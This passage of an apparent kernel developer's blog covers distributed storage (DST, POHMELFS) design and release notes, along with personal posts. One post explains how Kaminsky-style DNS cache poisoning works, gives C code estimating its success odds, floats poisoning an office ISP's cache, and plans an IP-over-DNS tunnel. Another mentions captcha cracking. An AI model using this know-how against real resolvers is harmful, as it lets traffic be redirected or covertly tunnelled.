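			err = action(w->priv);   /* worker thread context in the real pool */
		w->busy = 0;
		return err;
	}
	return -1;  /* the real pool would wait up to the timeout first */
}

/* Example per-thread state and job: a toy "checksum" instead of real crypto. */
struct demo_crypto {
	const unsigned char *buf;
	size_t len;
	unsigned sum;
};

struct demo_job {
	const unsigned char *buf;
	size_t len;
};

static int demo_setup(void *priv, void *data)
{
	struct demo_crypto *c = priv;
	struct demo_job *j = data;

	c->buf = j->buf;
	c->len = j->len;
	return 0;
}

static int demo_action(void *priv)
{
	struct demo_crypto *c = priv;
	size_t i;

	c->sum = 0;
	for (i = 0; i < c->len; i++)
		c->sum += c->buf[i];
	return 0;
}
```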
This thread pool system is used by the crypto processing code in
the distributed subsystem: when block io request is about to be sent,
or when system has received reply for the read request, it schedules
crypto processing work to the pool, initialized at DST node setup time.
Crypto processing does not work in DST yet, and neither do some other bits;
so far I have only played a bit with its initialization sequence, so it was
split into network, crypto and security initializations and node start, which
registers new storage in the block layer subsystem. These steps allow introducing
additional initialization steps later if needed without breaking backward
compatibility.
Next steps include proper network initialization and processing and transaction
management helpers. Then I will combine all existing code and make a first
renewed release.
Stay tuned!
There are two types of this attack: DNS query ID guessing and
request source port guessing for servers which use randomized source
port, which should be turned on after Dan Kaminsky's
alert.
DNS ID is 16 bits only, so it can be guessed rather fast; one just needs to force someone
who uses the attacked DNS cache to issue appropriate requests. When an answer is received by
the DNS resolver, it is cached there for a predefined amount of time (TTL parameter provided
by the higher-level DNS resolver or eventually the authoritative name server). Dan found that
the attacker can actually ask not for the attacked domain, but for some subdomain of it
(if the attacker tries to point www.microsoft.com to his own IP, he can force sending DNS
requests for 1.microsoft.com, 2.microsoft.com and so on), and put data about the actual
target into additional resource records attached to all datagrams. So, when he eventually
wins the race, he can store (among lots of subdomains) the needed pointers in the attacked DNS cache.
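A rough estimate of how fast the guessing goes, as a sketch under simplifying assumptions that are mine: the ID and the source port are picked uniformly and independently, every forged reply in one race is a distinct guess, and all of them arrive before the real answer. Since each subdomain starts a fresh race, the races are treated as independent.

```c
#include <assert.h>

/* Chance that one race is won with `forged` distinct (ID, port) guesses. */
static double race_hit_probability(double forged, double ports)
{
	double p = forged / (65536.0 * ports);

	return p > 1.0 ? 1.0 : p;
}

/* Chance that at least one of `races` independent races is won. */
static double poison_probability(double forged, double ports, unsigned races)
{
	double p = race_hit_probability(forged, ports);
	double miss = 1.0;

	while (races--)
		miss *= 1.0 - p;
	return 1.0 - miss;
}
```

With a fixed source port (ports = 1) and 32768 forged replies per race, one race succeeds with probability 0.5 and two races with 0.75; every additional bit of port randomness halves the per-race chance.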
I've just thought that this attack will not be possible, if all queries from DNS
resolvers to higher-level resolvers and/or authoritative name servers would happen over
TCP instead of more common UDP. There is no need to issue requests from random ports anymore,
no need to parse and drop additional resource records. There will be no problems with truncation
of large messages... But to play a bit with the whole idea I'm implementing a simple DNS
query/response processor. Maybe will play a bit with local cache (ISP at office uses only 6 different
ports to send requests) poisoning, although its main goal is
IP-over-DNS tunnel.
This is kind of a real rest after VISA/hotel paperwork. I was told that if I am
called to the embassy for an interview, chances are high the VISA will be declined because of my
sense of humor :)
And the DNS protocol gets the first prize among the ugliest crappies.
Now it's time to create the DNS server itself, which will get requests (the above dump shows a BIND session),
parse them and perform appropriate actions, like sending a reply with specially crafted additional resource
records, either a NULL one for example (it can contain up to 64k of data) or TXT (a length byte followed by
a character string; there may be multiple strings as long as the total length (including the length bytes themselves)
is less than 64k). Or an additional A resource record, which may contain information about the domain to poison...
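The TXT layout described above (length byte, then up to 255 bytes, repeated) can be packed like this. It is a sketch with a made-up function name; it splits arbitrary binary data into character strings and refuses anything that would not fit into the 16-bit RDLENGTH field.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Pack `len` bytes into TXT RDATA: a sequence of <length byte><data> strings,
 * each carrying at most 255 bytes. Returns the RDATA size or 0 on error.
 */
static size_t txt_rdata_pack(uint8_t *out, size_t room, const uint8_t *data, size_t len)
{
	size_t pos = 0;

	do {
		size_t chunk = len > 255 ? 255 : len;

		/* RDLENGTH is 16 bits wide, so the total can not exceed 65535 */
		if (pos + 1 + chunk > room || pos + 1 + chunk > 65535)
			return 0;
		out[pos++] = (uint8_t)chunk;
		if (chunk)
			memcpy(out + pos, data, chunk);
		pos += chunk;
		data += chunk;
		len -= chunk;
	} while (len > 0);

	return pos;
}
```

600 bytes of payload become three strings of 255, 255 and 90 bytes, 603 bytes of RDATA in total, so the overhead is one byte per 255 bytes of tunneled data.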
This release was fully made by other developers. Thanks a lot for your work.
I only updated some trivial bits and fixed bug in the server.
Short changelog:
Documentation update by Adam Langley (agl_imperialviolet.org).
Now one can read properly spelled POHMELFS design.
Server and configuration utility IPv6 support by
Varun Chandramohan (varunc_linux.vnet.ibm.com). Kernel client
does not need these changes, since it supports any protocol.
Now one can create a POHMELFS cluster over IPv6.
Server bug fix and small documentation update by me.
One can get more details about POHMELFS at its
homepage.
Sources can be downloaded from archive
or via GIT tree.
I accumulated patches from Varun Chandramohan of IBM Linux center,
which add IPv6 support to the POHMELFS
server and configuration utility. Kernel client does not need it, since it works
with any kind of addresses (by design).
I also wanted to add documentation update from Adam Langley, but apparently
I accidentally deleted his patches, so release is being postponed a bit.
Meanwhile I made some little progress at DST
development side. Added trivial configuration bits and started to develop cryptography part,
mainly configuration (which I will copy from POHMELFS) and thread pool subsystem.
The latter is a rather simple patch, which will allow creating a thread pool, adding/removing
threads on demand and queueing work to the pool. In theory this can be a generic
enough patch to be used by other users (I even saw some kind of topic proposal for
kernel summit), but so far I'm not going to push it separately from DST. The main goal
of this system is crypto processing of the BIOs for the distributed storage.
I do not, so there are no photos with me on this site
(if you would see my passport photos...). But I like to make
them and sometimes I create really interesting ones.
People even print them and give me presents for it, and since photos were
made in public, I think I can publish them.
Although I frequently take photos of people in public when they do not expect it,
and these are really the best ones (never look at the photographer!).
I sometimes take them to laugh at someone; this is of course private data,
which I only send to the 'model', if I do not delete it immediately.
My theory is that all people are very interesting from the photographer's point of view.
This just has to be found. I'm trying to do it, and sometimes I succeed.
I do not know, if it is good or not
to publish such photos. I only save pictures which are definitely interesting for me.
Of course it's just a matter of taste.
So, I'm thinking about creating a new tag in my blog, where I will post photos taken by me.
Not that many, one or so pictures per week. So if you do not like the idea, you can always
read the development tag only.
After some before-sleep reading (this time the DNS RFC specifications) I found
that the DNS protocol is so extensible that it can perfectly cover not only its own area,
but also help with really lots of related problems. It already has (though completely
unused) many interesting RRs and types, which have nothing to do with DNS
(like the NULL RR, which allows transmitting binary data, or the TXT RR, which also is not
related to the DNS area). And the most popular RRs are A, PTR, SOA, CNAME and MX. That's all
out of about 20 others. The same applies to (q)type and class (I read
about the Hesiod class for the first time, for example). And DNS allows introducing your own classes, types and resource
records.
It is just not used, but we could create distributed DNS system with new types.
It would be really simple (and actually it can be done even without new DNS extensions).
But it is not actually needed, since people are used to have DNS just like it is.
Another example is internet video. There is de-facto Adobe standard, no matter what W3C will
put into its new standard, everyone will continue to use existing one. Just because it works
ok. Not excellent or perfect or whatever, it just works how we used to know.
And there are lots and lots similar examples.
People are so inert in these questions (although I think in most areas, just because
it is convenient not to do something better when the existing solution just works, even
if not perfectly and even if not well), that no one will ever bother to change something
dramatically, because it will not only require a huge amount of money, but also changes in the
way people are used to thinking about the given area, which is likely an even more complex (and money-hungry)
problem.
All this talk is about a simple thing I have just discovered for myself: when you have created something
completely new, even if it is not the best solution for the given problem, and you start
pushing it to a wide audience, then you are able to get all of 'the market'. That's why
when you bring something new
to a market where most of the users are already used to working with one or another solution
(even if your project is potentially very good and definitely much better than the existing solutions),
there will not be any major gain, only a few completely new users.
This is probably told to first-year MBA students, but I was quite excited and disappointed
by this issue: the first new idea, when properly presented, even if not the best solution for the given
problem, can get all the users, after which they will not switch to a newer one just because they
are used to having it this way.
Since I'm quite busy with VISA/hotel/tickets and overall preparations
for Kernel Summit, there is no development progress, but it should be
completed very soon I think, and so I will write here some design notes
I have in mind about how POHMELFS server will be designed. It is not a
finished draft, but somewhat a rough direction paint.
POHMELFS will utilize a distributed hash table approach, i.e. the storage
will support the ability to get an object based on some key attached to it.
In a local filesystem we already work with a hash table: directory
lookup is no more than a lookup of the inode object based on its name, i.e.
a lookup of the value based on the attached key. And although the key in this
case is not created from the object itself (like a hash of the content or
some other function), it still is a (turn on your imagination here) table lookup.
The cloud of POHMELFS servers will utilize a similar approach. Consider a single
server in the system. When it joins the cloud for the first time (I omit this process for now
and will describe it below), it is empty, so it gets some unique
ID, either via administrator steps or randomly, or it just waits in the queue
to be filled with new data and gets an ID at that time. It does not matter
for now how it gets its ID, but this ID is propagated to some cloud of its
neighbours (or, if it were BitTorrent or Napster, to the main server).
There are two ideas on how to treat this ID: either as a part of the filename,
or as a nameless pointer in the abstract namespace, I will show below that actually
it does not matter.
Now, let's check what happens when a user wants to perform some IO on a given file.
Every file access actually happens on an inode stored on disk. In our case it can be stored
somewhere we do not know yet, so we need to perform a lookup to get the address
of the node in the cluster which contains our data. In existing schemes like BitTorrent
or Lustre there is a server (or a small cloud of servers) which contains mapping information
about where this or that object is placed in the data cloud, so a simple lookup on this server(s)
returns the needed info. This approach does not scale to really large numbers of nodes and is failure-prone.
Instead I consider completely distributed metadata storage. Let's check how the system will look up
the whole path in our case.
Each path starts from the root directory, which is '/', which in turn is an ID in the global
namespace (or a hash of this string or whatever other mapping), so we first need to look up
the node which is responsible for the content of this directory. Each node contains routes only
to a very limited set of neighbour nodes (in various designs this number varies, but the idea
lies in the fact that the node performing the lookup does not know which node contains the needed info).
The Gnutella system just broadcasted this lookup request to all of its neighbours, each of which
broadcasted it to its own neighbours and so on, until one of the systems replied that it contains
the needed info. The amount of unneeded broadcasts killed Gnutella the next day after Napster was closed.
So, this approach does not scale, and instead we need to map the needed directory to a node address
in a more intelligent way. There are at least two most appealing design choices: the ring-based
structure implemented in CHORD and the multidimensional torus implemented in CAN.
Right now it does not matter; let's assume that we have found the node which has information
about the content of the needed directory. When we have that data, we can find the next node (or this
info can be cached on the 'parent' directory node) and so on until we get to the node which is responsible for
storing the content of the needed object.
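To illustrate the ring-based variant, below is a sketch of the successor rule which CHORD-like systems use to map a key to a node: the directory name is hashed into the same ID space as the nodes, and the first node whose ID is not smaller than the key (wrapping around the ring) is responsible for it. This is only the mapping itself on a full, sorted list of node IDs; the routing through a limited set of neighbours is left out, and the FNV-1a hash is just a stand-in, not something the POHMELFS design prescribes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* 32-bit FNV-1a, used here only as a simple stand-in hash for path names. */
static uint32_t fnv1a32(const char *s)
{
	uint32_t h = 2166136261u;

	while (*s) {
		h ^= (uint8_t)*s++;
		h *= 16777619u;
	}
	return h;
}

/*
 * ids[] holds node IDs sorted in ascending order. Returns the index of the
 * first node with ID >= key, or 0 when the key is above all IDs (wrap-around).
 */
static size_t ring_successor(const uint32_t *ids, size_t n, uint32_t key)
{
	size_t lo = 0, hi = n;

	while (lo < hi) {
		size_t mid = lo + (hi - lo) / 2;

		if (ids[mid] < key)
			lo = mid + 1;
		else
			hi = mid;
	}
	return lo == n ? 0 : lo;
}

/* Node responsible for a directory, e.g. "/" or "/home". */
static size_t ring_lookup_dir(const uint32_t *ids, size_t n, const char *path)
{
	return ring_successor(ids, n, fnv1a32(path));
}
```

A path lookup would then call ring_lookup_dir() for '/', ask that node about the next component and so on, which matches the step-by-step walk described above.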
When a new node joins the cloud it connects to one or another known node (provided either by a public
service or by the administrator), sends information about its available space there, gets an ID
and just waits until some client connects to it and starts writing data.
When node joins with some content, which was written to it by the system before, or written by
local users bypassing distributed mechanism, node has to tell this information to the node, which
holds parent directory. This information should be stored in each directory it exports, or it
can be provided by administrator, for example this node exports dir '/zbr' which is actually a subdir
of '/home', so node will lookup '/home' directory content owner and update its records, that now
it contains a new dir. There is a problem here: what if there is already another node which also
claims to have dir '/zbr' in '/home'? This can be handled via an extended attribute attached to each object,
which tells us the last modification date, so the system can select either the most recently modified '/zbr'
dir or the node which contains the dir with the biggest number of identical replicas. This can be set up by
the administrator.
Main advantage of this joining scheme is the fact, that we actually do not need to know content of any
object in the exported directory, we publish only high-level object, which may or may not contain some
inner file or dir. Thus we do not need to hash millions of files in the exported directory and publish
them one by one, we do not need to store information about each inner object,
do not need to attach a full path to each object and so on.
When we decide to split the same object between multiple nodes, we will need not only
name-based lookup, but also to extend it to the offset inside the object. This can be done by introducing
a system-wide 'block size', so each file is actually a set of blocks of the given size, and when we have found the node
responsible for storing information about the directory where the file is located, this node can also contain
information about where each part of the object is stored.
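The offset part of such a lookup is plain arithmetic. A sketch, with hypothetical names and without overflow handling: given the system-wide block size, an IO request is translated into the range of block indexes it touches, and the directory node can then map every block index to the node which stores it.

```c
#include <assert.h>
#include <stdint.h>

struct block_span {
	uint64_t first_block;   /* index of the first block touched */
	uint64_t last_block;    /* index of the last block touched */
	uint64_t first_offset;  /* offset of the request inside the first block */
};

/* Translate (offset, size) inside an object into block indexes. */
static int object_block_span(uint64_t offset, uint64_t size, uint64_t block_size,
			     struct block_span *out)
{
	if (size == 0 || block_size == 0)
		return -1;
	out->first_block = offset / block_size;
	out->first_offset = offset % block_size;
	out->last_block = (offset + size - 1) / block_size;
	return 0;
}
```

For example, with 4096-byte blocks a 4000-byte write at offset 5000 starts 904 bytes into block 1 and ends in block 2.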
Looks quite simple, but... Devil is in the details.
I obviously missed some bits in the design (and I created it in mind during talk being
under 'impression' of the greece spirit while talking with asm@, who suggested to look
at Kademlia project), like redundancy management of the nodes, splitting of the node content between
multiple nodes and other bits, but it is one of the first drafts, so things can be changed if needed.
Stay tuned, I will be very soon back to development process
(DST first :), since paper work for kernel summit travel
seems to reach its end.
No, these are not the parts of the body I know (half of them I looked up
in the dictionary), it is what is aching right now.
It's called football.
Yes, it sounds a bit scary, but that was one hell of a super game today.
We were much stronger, but I have to admit that it was mostly because we made
the right transfer decisions and selected the right players at the beginning,
so our previous team was strengthened. I managed to score a goal,
make a couple of nice saves and even some quite technical dribbling,
which was quite surprising, since I had not played football for 5 years.
I would not say I'm getting into shape, but there is progress.
I've just thought, that I do not know a way to make
some (running) application to encrypt all its data,
which hits the disk (either via swap or usual way, like
editor writing the file and all its temporary files).
I actually consider this as a very useful feature for the
editors, browsers, instant messengers and mail clients,
downloading applications and musical players and
so on. This is especially valid for temporary files, when
one expects the editor to be highly secure (or even to work on an
encrypted partition), while its temporary files are stored
somewhere in /tmp, which is not encrypted.
It could be started via some wrapper, which will tell the
kernel encryption algorithm, key, iv and all needed info,
it will attach a crypto processing callback to the process,
so when disk activity is started by given pid (swap or data writing
or reading), it is encrypted/decrypted in flight.
Kernel should check all file descriptors opened by the given
process and appropriately process them. There may be some problems
with communication with unprotected applications, which should
be thought out, but overall I like the idea...
I've just realized that lots of my blog posts
are valid enough presentation abstracts, at least they contain
enough words describing the problem, a possible solution
and topics of overall interest for the given area. But I have
never presented such projects in English before, although quite frankly
I'm not that bad a speaker in Russian, at least I
am not afraid to talk and probably like contact with an interesting
audience. After all there is this blog :) and I have even given a number
of presentations of a similar kind, from 15 minutes to a couple of hours
including the question/answer part.
The English I use in the blog is rather ugly, but I rarely (if at all)
fix errors which I detect when rereading the text
in the browser (and I detect lots of them), and the same goes for mails
and other posts.
So probably eventually we will have interesting
talks about different areas, but expect to 'listen' to the world-wide
language of gestures :)
As you may know, the DST
project was an attempt to implement a redundant, failover-resistant, flexible block-level storage
subsystem. Among other features it supported the ability to map multiple remote nodes via linear
or mirroring algorithms to a single node, reconnecting to a failed node, read balancing,
parallel writing to multiple nodes (in case of mirroring) and
so on.
Now it is gone. There is no more of the distributed storage you knew before; instead there is
a completely new project being developed, whose main goal is to provide a transport layer for
block requests only. Consider it as Network Block Device on huge steroids. Consider it
as iSCSI on huge steroids. Consider it as ATA-over-Ethernet on even huger steroids.
It is just an example of what all those protocols should have. And only that.
And it does not sound very ambitious: previous DST versions already supported lots of features
which never existed (and in some cases were impossible to add) in other block-level
network storages.
DST moves further.
There will be no mirroring or any ability to map multiple devices into a single one;
instead one should use Device Mapper for this goal, since its features were simply mirrored
(although I tried to optimize them sometimes) in DST, and the number of targets was noticeably smaller.
Now DST is just a simple block device which operates on top of a network connection. With just a
single exception: it's done right.
Features planned for the new Distributed Storage:
kernelspace client and server
initial autoconfiguration between client and server nodes
automatic reconnect to failed target
transaction model: resending, timeout error completion, full rollback of the failed transaction
wire speed performance
data channel encryption, strong checksumming
cryptographic authentication
ability to work on top of any network protocol
barriers support (when, if ever, Device Mapper starts to support them, DST will not need to be changed)
flexible protocol with simple ability to extend it to needed functionality
trivial configuration
Project is being written from scratch, but it is actually very simple,
and should be quite small, so expect its first release quite soon.
It will be pushed upstream when ready.
I also managed to play second octave F# and sometimes the whole chromatic scale
down to small (minor?) octave F on my trumpet, and I believe I have started to understand
the overall trumpet kung-fu, but I expect it is not what you wanted to read under the
DST tag.
So, DST becomes smaller, cleaner and simpler. Notably, I decided to drop userspace
target completely for now.
Kernel part now operates on transaction entity, which holds a reference to the node,
where data should be sent/received. There can be at most two such nodes if block IO
request spans the boundary. In case of mirroring (which will be dropped for the first release)
list of nodes to mirror this data to will be maintained by the first node, so transaction
will not need to know about them.
In theory a block request can be as large as BIO_MAX_PAGES pages,
which is 256 for now, but I decided to require the minimum node size to be not smaller than
the above bio limit, so there will always be at most two nodes per request.
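A sketch of why the size limit gives the "at most two nodes" property, assuming the nodes are mapped linearly and contiguously, with sizes counted in 512-byte sectors and 4096-byte pages (so 256 pages are 2048 sectors). The struct and function names are invented for the example and are not DST code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define DEMO_BIO_MAX_SECTORS (256 * 8)  /* 256 pages of 4096 bytes, 512-byte sectors */

struct node_range {
	uint64_t start;  /* first sector served by the node */
	uint64_t size;   /* number of sectors, assumed >= DEMO_BIO_MAX_SECTORS */
};

/*
 * Find the nodes touched by the request [start, start + len).
 * nodes[] must be sorted and contiguous. Returns 1 or 2 and fills out[],
 * or -1 if the request is out of range or would need more than two nodes.
 */
static int request_nodes(const struct node_range *nodes, size_t n,
			 uint64_t start, uint64_t len, size_t out[2])
{
	uint64_t end = start + len;
	int found = 0;
	size_t i;

	if (n == 0 || len == 0)
		return -1;
	if (start < nodes[0].start || end > nodes[n - 1].start + nodes[n - 1].size)
		return -1;

	for (i = 0; i < n; i++) {
		uint64_t nstart = nodes[i].start;
		uint64_t nend = nstart + nodes[i].size;

		if (start >= nend || end <= nstart)
			continue;
		if (found == 2)
			return -1;  /* can not happen while len <= DEMO_BIO_MAX_SECTORS */
		out[found++] = i;
	}
	return found;
}
```

Since every node is at least as large as the biggest possible request, a request can cross one node boundary at most, so a transaction never needs more than two node references.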
Each node has either block device behind it (so it will just call generic_make_request()
with different block device for given bio), or network state machine.
Network state will have two threads: RX and TX. The receiving one is used to get replies for the
read/write messages, find the appropriate transaction and complete it.
In case of the DST server it will also handle read/write requests and generate replies, but the whole
processing will be exactly the same: the client node will also have a switch to process read/write requests from
the network, but they should only be received by the server.
The sending thread is tricky.
It is used as a fallback for non-blocking sockets, which are used first at generic_make_request()
time, i.e. when a higher-level user performed a read or write. If a block was not fully sent,
it is queued to this thread, which will try to send the rest of the data when
polling allows. The ->make_request_fn() function returns in this case and the higher
layer can proceed with its own operations.
A transaction is not freed until a reply is received from the remote side or the resending retry
count is exhausted.
A transaction is always allocated (from the appropriate memory pool) and that is actually
the only allocation in DST itself. In case it works with block devices, it is possible to clone a bio
when it crosses the boundaries (or even always, I have to check it, but it is essentially
what device mapper does, with lots of additional allocations of its own), but it should be a very rare condition.
The network stack will allocate data itself too.
That was the theory. Practice tells me that essentially 90% of the code should be rewritten
from scratch, so I recloned the tree and so far have implemented the generic bits of registering
a block device, creating various sysfs files and directories and other similar trivial bits.
I still plan to finish it this weekend (without mirroring), though things may turn out differently...
Checked my passports and decided that if other countries let me in
with those photos, then US customs officers should not frown too much upon the
current ones.
So, waiting for the results. I am almost sure that I will get the visa and
will meet interesting people at kernel summit and the Plumbers conference,
but anyway I would like to draw the line.
For instance, Zach Brown will talk about CRFS (as well as show
some chocolate and cocktail bars around; imho the only good cocktail is rum with cola
(less cola) and ice), so there will be something to listen to.
Just finished reading this excellent
detective novel (at Amazon,
electronic version in Russian).
People call it the best English humor novel for a reason: it is indeed fun and interesting,
although I suspect lots of its witty satire was a bit lost in translation, but nevertheless
I do recommend it for easy reading.
And of course if you like House M.D., you have
to read this novel, and you will not waste your time for sure.
Today's morning I raped ears almost two hours,
and at the end managed to play a chromatic scale (glide?)
from second octave D (E trumpet) down to minor octave F (E trumpet),
at least that is what my Korg tuner showed. Much more frequently
I was able to play single first octave (only via descended direction
though, I did not yet try to rise tones).
The Korg AW1 tuner does not show octaves, but I really do not think
that it is possible to play one octave lower than my lowest
sound was, and I am pretty sure it is possible to go at least one octave higher
than my highest tone, so I decided that I play several tones around the first octave.
Ugh, it was supposed to move earlier to the office (before heat and traffic jams),
but instead I fucked my brain via ears (and probably neighbours were not happy
either, although I did not play on the full volume).
I believe I can produce enough sounds out of my trumpet,
so I need a tuner, which will tell me how bad those sounds are.
So, now I'm starting to seriously tune my sounds.
So far I think that I can play at least two octaves; actually I mean not to play,
but to produce a sound, it is still not that simple and not always very clean. But since
I have 'played' (or better say, studied) my trumpet for only a couple of months, never played any instrument (not counting
a couple of guitar riffs at the university) before and do not play with a teacher, I think this tuner will
be a very good addition.
Yes, DST
project is alive and will beat out the crap very soon, since I decided to change its
underlying architecture, and switch to transaction model just like
POHMELFS.
This basically means that as long as the system has enough RAM, write operations will be
extremely fast, reads can be balanced between multiple nodes (in a mirror), transactions
can be resent, the failover mechanism becomes much simpler,
and the system overall will be much more robust to failures.
The transaction model also means that the system requires an explicit acknowledgement from the remote side,
and there are two possibilities here: to handle the implicit ack which comes with TCP ack
packets, like I experimented with
before, or to send an explicit ack from the server for each client's request.
The former approach, although it has smaller performance overhead, still suffers from
the fact that pages sent via DST are always stateless, i.e. at this layer there is
no knowledge about who sends this page. We can determine the inode the page belongs to, can
even get the socket when the page is about to be released after the ack has been received,
but we can not know from exactly which pipe it was submitted into the given socket,
so when multiple threads send the same page via multiple sendfile()
calls we do not know when and how the page will be released. We can put the pipes this page belongs
to into a singly-linked list (since the page has only two pointers unused at this point: the LRU
list head, and one of them is used to determine that this page belongs to the sendfile()/splice codepath),
and likely traversing this list will not hurt usual users, but a malicious one can
create a local DoS with this approach. After some experiments with the splice code
today I decided to drop the implementation of this idea for now.
There is a strong argument in favour of explicit acks from the server: they allow asynchronous transaction
processing (with implicit acks we can not hook into the processing path, since we do not know where exactly
the skb with our pages is chained), and they do not hurt performance (which was proven by
POHMELFS benchmarks).
So, the overall plan for DST development is to switch to the transaction model and perform async processing
of all events (there are actually only two: reading and writing of the given pages to given
locations).
This task is not that complex, so I expect some new results later this week. Stay tuned!
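To make the transaction model with explicit acks a bit more concrete, here is a small userspace sketch in Python. It is not DST code: the class name, the timeout handling and the idea of returning expired ids for resending are my assumptions for illustration only.

```python
import time


class Transactions:
    """Hypothetical table of in-flight transactions waiting for explicit acks."""

    def __init__(self, timeout):
        self.timeout = timeout
        self.pending = {}   # transaction id -> (payload, deadline)
        self.next_id = 0

    def submit(self, payload, now=None):
        """Remember the payload until the server acknowledges it."""
        now = time.monotonic() if now is None else now
        tid = self.next_id
        self.next_id += 1
        self.pending[tid] = (payload, now + self.timeout)
        return tid

    def ack(self, tid):
        """Explicit ack from the server: the data can be released now."""
        return self.pending.pop(tid, None) is not None

    def scan(self, now=None):
        """Return ids whose ack is overdue and re-arm them for a resend."""
        now = time.monotonic() if now is None else now
        expired = [tid for tid, (_, deadline) in self.pending.items()
                   if deadline <= now]
        for tid in expired:
            payload, _ = self.pending[tid]
            self.pending[tid] = (payload, now + self.timeout)
        return expired
```

The point of the sketch is that the data is kept until an ack arrives, so resending or failing over to another node is just a matter of walking the pending table.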
That was an exceptionally bloody cool evening!
We had three teams of 6 players each and played
on a small mini-football field for about 2.5 hours; each match lasted
either 7 minutes or until 2 goals were scored into one goal. It drained power
in such a cool way that even the exceptional tiredness right now brings
a kind of masochistic pleasure.
My breathing system really sucks, and actually it is not a surprise:
I have not played football for more than 5 years, but nevertheless
the shoes and ball are in good shape.
I managed to damage knees, a shoulder and toes in various
'contacts' during the game, but that's not a problem.
Our team was not really the best one, but we firmly hold second place,
and actually can fight for the first one, since all our players had long
enough pauses in their own games, while the first team's players regularly train
in their own teams (including a youth football champion).
This interpolation uses the cardinal splines approach, namely
Catmull-Rom splines. The next task is to test how Kochanek-Bartels splines (also called TCB-splines)
behave. The latter are used in all popular 3D modelling engines. Since the math behind them
is very non-trivial, I will just try to use the existing formulas for Hermite tangents, which
are quite simple.
Now it's time to think about how to use this knowledge and how to apply the given approach
to detect and decode letters in the image...
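For reference, a Catmull-Rom segment can be written as a cubic Hermite curve whose tangents are half the chord between the neighbouring points. The Python sketch below shows only this textbook form; it is not the code of my GTK application, and the function name is made up for the example.

```python
def catmull_rom(p0, p1, p2, p3, t):
    """Point on the Catmull-Rom segment between p1 and p2, t in [0, 1]."""
    # Hermite tangents at p1 and p2: half the chord between their neighbours.
    m1 = tuple((c - a) / 2.0 for a, c in zip(p0, p2))
    m2 = tuple((d - b) / 2.0 for b, d in zip(p1, p3))

    # Cubic Hermite basis functions.
    t2, t3 = t * t, t * t * t
    h00 = 2 * t3 - 3 * t2 + 1
    h10 = t3 - 2 * t2 + t
    h01 = -2 * t3 + 3 * t2
    h11 = t3 - t2

    return tuple(h00 * a + h10 * ma + h01 * b + h11 * mb
                 for a, ma, b, mb in zip(p1, m1, p2, m2))
```

The curve passes through p1 at t = 0 and through p2 at t = 1, which is why this family is convenient for interpolation: p0 and p3 only shape the tangents.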
I have not played football for several years, but I've found people
who do like it, so our games promise to be really fun and interesting!
There are already three teams (4+1 players in a team).
This will be my first game after about 5 years of football silence;
likely there is nothing left in the legs which can help in playing football,
and climbing likely does not correlate with it, as well as my experience in other physical training,
but nevertheless I'm looking forward to this game, which promises to be exceptionally cool!
Playing with different spline interpolation methods. So far they seem to be quite simple
when written in matrix form, so I cooked up a simple GTK application to test various methods.
There is no interpolation implementation yet, since I devoted the last two days to reading lots of
materials about Bezier and Hermite interpolation techniques (as well as lots of papers about
distributed hash tables, which I will use as a filesystem storage base for
POHMELFS).
The next step is to squeeze the images, so that all bold lines become single-pixel ones.
In theory it should not be very complex (I have an algorithm in mind), but in practice
it will be - starting to recall why the hell I
learnt LISP.
The basic idea is to transform the above BW pictures into a simple binary format, which will be read by a LISP
application, since I do not know and do not want to devote much time to learning how to parse/process
various image formats; instead this is done by the GTK application written in C. I believe LISP was
called the best language for artificial intelligence development for a reason, so I will try to
find out why.
I'm not a major kernel contributor, but I was invited 3 times in the last
3 years to the kernel summit.
And I will try to get to this year's
one
in Portland, Oregon; at least I started some preparation and contacted the needed people.
I hope I will also participate in the
Plumber's conference.
As before I will bring a bottle of vodka (the number of people
who wanted to talk suddenly dropped to the ground) and will greatly appreciate your
contact and discussion topics :)
That's of course if the stars stay in a straight line, but I will push
them a bit.
Strong cryptography support. One can encrypt whole data channel (except headers) and/or hash/digest it.
The system will try to autoconfigure itself, and if the server does not support the requested algorithms, mount will either
fail (if a special mount option is specified) or disable usage of the appropriate algorithm.
Bug fixes.
Cryptography support is an essential addition to the POHMELFS core. It was implemented with performance
in mind, so that processing speeds would not drop noticeably even in case of very CPU-hungry operations
(one can check performance graphs).
POHMELFS utilizes a pool of crypto threads (their number can be specified via a mount option), which perform data crypto
processing and submit the data either to the network or to the VFS layer.
Now I will concentrate mostly on userspace server features, mainly its distributed facilities. The current ability
to write data to multiple servers and balance reading among them is not enough for POHMELFS, but it will be an
essential building block of the fully distributed fault-tolerant parallel filesystem.
If this development requires some changes on the kernel side (namely a network protocol extension), they will be
done in the upcoming releases, together with fixes for any bugs found.
As usual, you can grab sources from
archive or via
GIT tree.
You can also check POHMELFS homepage
to get more details on its design and supported features.
P.S. I think I will have a rest from this project for several days, which will allow me to concentrate on
the main POHMELFS features and work out rough edges. I will switch to DST
and netchannels (mainly to make new releases)
and then will devote some time to captcha cracking algorithms.
If you expected a miracle, it did not happen, so I just present a picture, where
I compared a plain async in-kernel NFS server (no encryption, no checksumming)
versus POHMELFS, which performed SHA1 hashing and AES-128-CBC encryption of the whole
data channel.
The block size used in the iozone test is 8KB, the file size is 8GB, and the machine has 1GB of RAM.
Vodka itself is a very interesting drink, but depending on
the situation it can be either the cheapest way to become very drunk,
or a possibility to have a long and fun time in good company.
Frequently (and likely most of the time) vodka is used for the first
case only, which is sad of course.
I do not know when and how vodka became popular in Russia, but
I think it is always associated with my country now. Actually
every nation has some kind of vodka in its own history of drinks,
and likely still has it. For example UK/Ireland has whiskey, which
is effectively vodka, but aged in oak barrels. This brings a very
interesting taste, which allows using it as a kind of long drink
(especially with ice). After having a whiskey shot one can start breathing
air in (especially via the nose), which brings the aftertaste directly into the brain
and to every piece of the body. I do not know any cocktails based on whiskey.
In my opinion, Irish whiskey is much more tasty and interesting than
(probably originals of) Scotch, although the former has many more labels.
The USA also drinks whiskey, but most of the time it is its own
labels, which I have not tried yet. The USA does not have its own popular
drink though, or at least I do not know of it.
Europe also has lots and lots of different kinds of vodka.
The French drink cognac. I do not like it, and believe that it is only
coloured tasteless vodka, likely even the best labels like Rémy Martin and Hennessy
(although the latter was founded by an Irishman :), but it is only a matter of taste
of course. The cognac creation process is a bit more complex than
that of vodka, and it also has a very different taste, which (for me) is nevertheless very similar
to clean vodka. Cognac is one of the most popular strong drinks. The culture of
drinking it is forgotten, but nevertheless it is very interesting. Cognac should be
drunk only at a special temperature (16 degrees Centigrade) from a glass of special
